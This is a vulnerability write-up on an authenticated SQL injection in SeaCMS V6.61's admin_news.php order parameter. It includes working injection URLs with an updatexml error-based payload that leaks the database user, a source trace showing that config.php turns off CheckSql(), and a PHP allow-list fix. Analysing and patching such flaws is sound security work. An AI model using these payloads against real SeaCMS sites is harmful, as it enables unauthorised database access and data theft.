SeaCMS latest version (V6.61) authenticated backend SQL injection [CNVD-2018-12347]

Backend injection; an admin login is required.

The injection point is in the ORDER BY clause (the order parameter of admin_news.php).

Normal request:

http://localhost/seacmsv6.61/meet/admin_news.php?n_commend=&order=n_id--#&page=0&type=

Descending order:

http://localhost/seacmsv6.61/meet/admin_news.php?n_commend=&order=n_id+desc--#&page=0&type=

Error-based injection with updatexml. The template appends " desc" after the order value, and the trailing comment hides it: a browser drops the "#" fragment, leaving "-- " (dash, dash, space) as the comment; if the "#" is sent instead, MySQL treats "#" as the comment start, so the rest of the line is discarded either way. The XPath syntax error raised by updatexml() carries the result of select user():

http://localhost/seacmsv6.61/meet/admin_news.php?n_commend=&order=n_id+and(updatexml(1,concat(0x7e,(select%20user())),0))--#&page=0&type=

Source analysis:

Vulnerable file:

\seacmsV6.61\admin\templets\admin_news.htm

admin_news.php pulls this file in with include.

<?php
$numPerPage=20;
if(empty($order)) $order="n_addtime"; // $order only gets a default when empty; otherwise it is taken from the request unfiltered
$orderStr= " order by d.$order desc"; // "d." is concatenated directly with $order
$page = isset($page) ? intval($page) : 1;
if($page==0) $page=1;
$whereStr=" ";
if ($action=="nullpic") $whereStr.=" and d.v_pic=''";
if ($n_recycled=="ok") $whereStr.=" and d.n_recycled=1";
if (!empty($type)) $whereStr.=" and d.tid in (".getTypeId($type).")";
if (!empty($keyword)) $whereStr.=" and d.n_title like '%".$keyword."%'";
$whereorder = str_replace("where order","order",str_replace("where and","and",$whereStr.$orderStr)); // with no filters set, $whereorder is simply " order by d.$order desc"
$csqlStr="select count(*) as dd from `sea_news` d where d.n_recycled=0 ".$whereorder; // first query built by string concatenation
if ($n_recycled=="ok")$csqlStr="select count(*) as dd from `sea_news` d where d.n_recycled=1 ".$whereorder;
$row = $dsql->GetOne($csqlStr); // the statement goes into GetOne()
if(is_array($row)){
$TotalResult = $row['dd'];
}else{
$TotalResult = 0;
}
$TotalPage = ceil($TotalResult/$numPerPage);
if ($page>$TotalPage) $page=$TotalPage;
$limitstart = ($page-1) * $numPerPage;
if($limitstart<0) $limitstart=0;
$sqlStr="select d.n_id,d.n_title,d.n_hit,0,d.tid,d.n_addtime,d.n_commend,t.tname from sea_news d left join `sea_type` t on t.tid=d.tid where d.n_recycled=0 ".$whereorder." limit $limitstart,$numPerPage"; // second query built by string concatenation
if ($n_recycled=="ok") $sqlStr="select d.n_id,d.n_title,d.n_hit,0,d.tid,d.n_addtime,d.n_commend,t.tname from sea_news d left join `sea_type` t on t.tid=d.tid where 1=1 ".$whereorder." limit $limitstart,$numPerPage";
//echo $sqlStr;die();
?>

Following GetOne():

seacmsV6.61\include\sql.class.php

The part that matters is Execute().

Before the statement reaches mysql_query() it is supposed to pass a SQL safety check; this is the key point.

$this->safeCheck is assigned true earlier, yet our payload never went through the SQL check. Why?

if($this->safeCheck)
{
    CheckSql($this->queryString);
}

admin_news.php includes seacmsV6.61\admin\config.php.

config.php sets $dsql->safeCheck=false, so the CheckSql() check function is skipped entirely and the SQL injection goes through.
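The following is an added example, not SeaCMS code. It models the ORDER BY concatenation from admin_news.htm for the three requests shown above (the normal, descending and updatexml ones), and places an allow-list version beside it. The helper names buildQueryVulnerable/buildQuerySafe, the column allow-list and the separate direction parameter are this example's own assumptions; only the column names and the query shape are taken from the quoted template.

```php
<?php
// Added example (not from SeaCMS): vulnerable ORDER BY construction vs. an allow-list fix.

// Vulnerable: mirrors admin_news.htm. $order is interpolated as-is, so any
// expression the attacker supplies becomes part of the ORDER BY clause.
function buildQueryVulnerable(string $order): string
{
    if ($order === '') {
        $order = 'n_addtime';          // same default as the template
    }
    $orderStr = " order by d.$order desc";
    return "select count(*) as dd from `sea_news` d where d.n_recycled=0 " . $orderStr;
}

// Hardened: only a known column name may be sorted by, and the direction is a
// separate, constrained parameter. Unknown input falls back to the default
// instead of being sent to MySQL; the identifier is also backtick-quoted.
function buildQuerySafe(string $order, string $dir = 'desc'): string
{
    // Assumed allow-list: the columns the listing selects in the template.
    static $allowed = ['n_id', 'n_title', 'n_hit', 'tid', 'n_addtime', 'n_commend'];
    if (!in_array($order, $allowed, true)) {
        $order = 'n_addtime';
    }
    $dir = (strtolower($dir) === 'asc') ? 'asc' : 'desc';
    return "select count(*) as dd from `sea_news` d where d.n_recycled=0 order by d.`$order` $dir";
}

// The three order= values from the write-up as PHP receives them: a browser
// does not send anything after '#', and '+' decodes to a space. Constructed here
// for the demo; no requests are made.
$payloads = [
    'n_id--',
    'n_id desc--',
    'n_id and(updatexml(1,concat(0x7e,(select user())),0))--',
];

foreach ($payloads as $p) {
    echo "order=" . $p . "\n";
    // The "-- " that precedes the template's " desc" comments the rest out,
    // so updatexml() is evaluated inside ORDER BY and raises the XPath error.
    echo "  vulnerable: " . buildQueryVulnerable($p) . "\n";
    // Every one of these fails the allow-list and is replaced by n_addtime.
    echo "  hardened:   " . buildQuerySafe($p) . "\n";
}
```

Turning $dsql->safeCheck back on would route these strings through CheckSql(), but that function is a blacklist applied to the finished statement; restricting $order to a fixed set of column names before it ever touches the query is the fix that does not depend on the blacklist keeping up.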

I saw someone apply for a CVE with this bug; on reflection it did not seem very interesting.